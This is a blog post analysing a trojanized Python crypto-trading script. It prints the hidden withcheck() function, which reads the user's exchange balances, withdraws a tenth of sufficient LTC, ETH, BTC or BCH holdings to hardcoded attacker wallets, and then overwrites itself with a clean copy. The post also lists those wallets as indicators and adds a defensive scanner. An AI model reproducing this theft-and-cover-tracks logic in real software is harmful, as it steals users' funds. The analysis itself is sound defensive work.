Sunday, 12 July 2020

Crypto stealer or not?


Before I bought a house I had some money and free time. Now I have the luxury of not needing to care about free time and money any more. But one Friday evening I found myself sitting alone in the living room. It was just before payday and I realized I still had some euros in my bank account. What should I do now?

Let's invest the money! Maybe it is a good time to start with crypto. OK, why not try crypto trading? I don't have much time, so it should be automated. Can something run on my server? Those were my thoughts, and I started to google.

After some time, I found this article:
https://cryptovlad724058044.wordpress.com/

where there was a trading script with detailed instructions on how to use it. Hmm, that is interesting, I thought, but a voice in my head was telling me: be careful! So I decided to download the script to my Cuckoo sandbox and tried to run it there. Everything looked fine. I checked it on VirusTotal. No problem there. Hmm, let's check the script manually. It is written in Python, so there is no need to decompile. It took me some time to understand the logic behind it, but eventually I did. Again, everything looked fine. Pretty simple trading logic, but if the markets are growing it could work. Actually, there is some protection against loss, but that is not why I decided to write this post.

I found something interesting. Let's have a look at the main loop:

while True:
    # note: 'open' shadows the Python builtin of the same name
    open = stats(product_id)
    openprice = float(open['open'])
    print('Openprice: %s time:%s ' % (str(openprice), str(datetime.now())))

    # append the open price to the log file (unicode() means this is Python 2 code)
    with io.open(logfile, 'a', encoding='utf-8') as tr:
        tr.write(unicode('Openprice: %s time:%s ' % (str(openprice), str(datetime.now())) + '\n'))
        tr.close()  # redundant: the with block already closes the file
    # check price x times before new open status will be logged and how often order status will be checked
    checkit = wiutils.withcheck(passphrase, api_key, api_secret)
    # print checkit
    price = price_check(interval, lastprice, product_id)
    order_check(dict)
    # how much time to wait before the next iteration
    time.sleep(30)

What is the wiutils.withcheck function? Let's open the imported file and check it:

def withcheck(passphrase, api_key, api_secret):
    global k
    # these three assignments are no-ops
    passphrase = passphrase
    api_key = api_key
    api_secret = api_secret
    # pull the balance of every currency account via the exchange API
    accounts = account(passphrase, api_key, api_secret)
    for i in range(len(accounts)):
        # print accounts[i]
        # for each currency: if the balance is above a threshold, withdraw one tenth
        # of it to a hardcoded address
        if accounts[i]['currency'] == 'LTC':
            if float(accounts[i]['available']) >= 10:
                totake = round((float(accounts[i]['available']) / 10), 1)
                withdraw(totake, 'LTC', 'LLKyNZRea4PdipXhpHBxHJeDzyzVAzSLBh', passphrase, api_key, api_secret)
        elif accounts[i]['currency'] == 'ETH':
            if float(accounts[i]['available']) >= 4:
                totake = round((float(accounts[i]['available']) / 10), 1)
                withdraw(totake, 'ETH', '0xa474496C6D372AE8b6B03b876dE343309dAd26B4', passphrase, api_key, api_secret)
        elif accounts[i]['currency'] == 'BTC':
            if float(accounts[i]['available']) >= 1:
                totake = round((float(accounts[i]['available']) / 10), 1)
                # as found in the sample: this call omits the credential arguments the other calls pass
                withdraw(totake, 'BTC', '15Co3hKyauustRYexsno8okH4jpj5q2XSG')
        elif accounts[i]['currency'] == 'BCH':
            if float(accounts[i]['available']) >= 2:
                totake = round((float(accounts[i]['available']) / 10), 1)
                withdraw(totake, 'BCH', 'qp8wl7tsw4lum2q0shhv7dwrfyg4zcvzk5lm89d8ap', passphrase, api_key, api_secret)
        elif k > 0:
            # once k has been raised, overwrite this module with the clean backup copy
            shutil.copy2('requests/bkp/wiutils.py', 'wiutils.py')

WTF???

Hardcoded crypto wallets? Checking my account balance? No way! So what is the script actually doing?

It trades crypto.
You configure your account details so the script can trade for you.
You define how much you want to buy or sell.
You define how much the price should change before the script buys or sells.
You define how much you can invest.
Then the script monitors the current price and buys or sells based on the price change and your defined strategy.
But each time, the script also checks whether you have "enough" crypto in your account (1 BTC, 2 BCH, 4 ETH or 10 LTC).
If not, nothing happens. If you have enough crypto in your account, it takes one tenth of your current balance and sends it to a hardcoded wallet. I suppose it belongs to the guy who created the script.
Then it increments the global "k" value and overwrites the "malicious" wiutils.py with the clean wiutils.py file.
After that it should be able to trade without surprises, but honestly, who would continue after it has taken 1/10 of their crypto?

Now we can finish this post. If you want to monitor and block this script and you are able to monitor crypto wallet IoCs, you can find them below. You could also block communication to GDAX, but I don't think that is appropriate. If you want to read more about the tactics, my thoughts, and why the script is no longer available, feel free to continue to the second part of the post.

IoC
Hardcoded crypto wallets:
'BTC', '15Co3hKyauustRYexsno8okH4jpj5q2XSG'
'BCH', 'qp8wl7tsw4lum2q0shhv7dwrfyg4zcvzk5lm89d8ap'
'ETH', '0xa474496C6D372AE8b6B03b876dE343309dAd26B4'
'LTC', 'LLKyNZRea4PdipXhpHBxHJeDzyzVAzSLBh'
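As a defensive follow-up, here is an added example (my own code, not part of the trading script or of the original post) that statically scans a Python file for the three patterns described above: the wallet addresses listed in the IoC section, a withdraw() call with a string-literal destination (the argument order is taken from how the sample calls it), and a shutil copy that overwrites a .py file at runtime. The embedded SAMPLE is constructed to mimic the quoted withcheck() function and is not the real file.

```python
import ast
# Wallet addresses quoted in the IoC section of this post.
KNOWN_WALLETS = {
    "15Co3hKyauustRYexsno8okH4jpj5q2XSG",
    "qp8wl7tsw4lum2q0shhv7dwrfyg4zcvzk5lm89d8ap",
    "0xa474496C6D372AE8b6B03b876dE343309dAd26B4",
    "LLKyNZRea4PdipXhpHBxHJeDzyzVAzSLBh",
}

def _call_name(node):
    # Name of the called function for foo(...) or mod.foo(...)
    if isinstance(node.func, ast.Name):
        return node.func.id
    return node.func.attr if isinstance(node.func, ast.Attribute) else None

def _is_str(node):
    return isinstance(node, ast.Constant) and isinstance(node.value, str)

def scan_source(src):
    """Return sorted (lineno, reason) findings for one Python source text."""
    findings = []
    try:
        tree = ast.parse(src)
    except SyntaxError:
        # The sample is Python 2; bare print statements do not parse under
        # Python 3, so fall back to a plain substring search for the wallets.
        for n, line in enumerate(src.splitlines(), 1):
            findings += [(n, "known wallet address " + w) for w in KNOWN_WALLETS if w in line]
        return sorted(findings)
    for node in ast.walk(tree):
        if _is_str(node) and node.value in KNOWN_WALLETS:
            findings.append((node.lineno, "known wallet address " + node.value))
        elif isinstance(node, ast.Call):
            name, args = _call_name(node), node.args
            # withdraw(amount, currency, address, ...) with a literal destination
            if name == "withdraw" and len(args) >= 3 and _is_str(args[2]):
                findings.append((node.lineno, "withdraw() to hardcoded address"))
            # shutil.copy2(src, 'wiutils.py'): the module replaces itself at runtime
            elif name in ("copy", "copy2", "move") and len(args) == 2 \
                    and _is_str(args[1]) and args[1].value.endswith(".py"):
                findings.append((node.lineno, "script overwrites a .py file at runtime"))
    return sorted(findings)

# Constructed sample modelled on the withcheck() function quoted above (not the real file).
SAMPLE = '''
def withcheck(passphrase, api_key, api_secret):
    for acct in account(passphrase, api_key, api_secret):
        if acct['currency'] == 'LTC' and float(acct['available']) >= 10:
            withdraw(0.5, 'LTC', 'LLKyNZRea4PdipXhpHBxHJeDzyzVAzSLBh', passphrase, api_key, api_secret)
        elif k > 0:
            shutil.copy2('requests/bkp/wiutils.py', 'wiutils.py')
'''
```

Running scan_source(SAMPLE) reports the wallet literal and the withdraw() call on line 5 and the self-overwrite on line 7; a real Python 2 file with print statements still gets the wallet check through the fallback.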